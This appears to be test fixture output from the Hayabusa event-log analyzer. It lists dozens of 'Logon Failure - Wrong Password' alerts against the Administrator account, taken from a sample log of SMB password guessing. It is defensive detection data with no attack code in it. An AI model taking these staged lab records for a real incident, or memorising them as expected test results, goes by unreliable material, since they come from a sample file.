+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
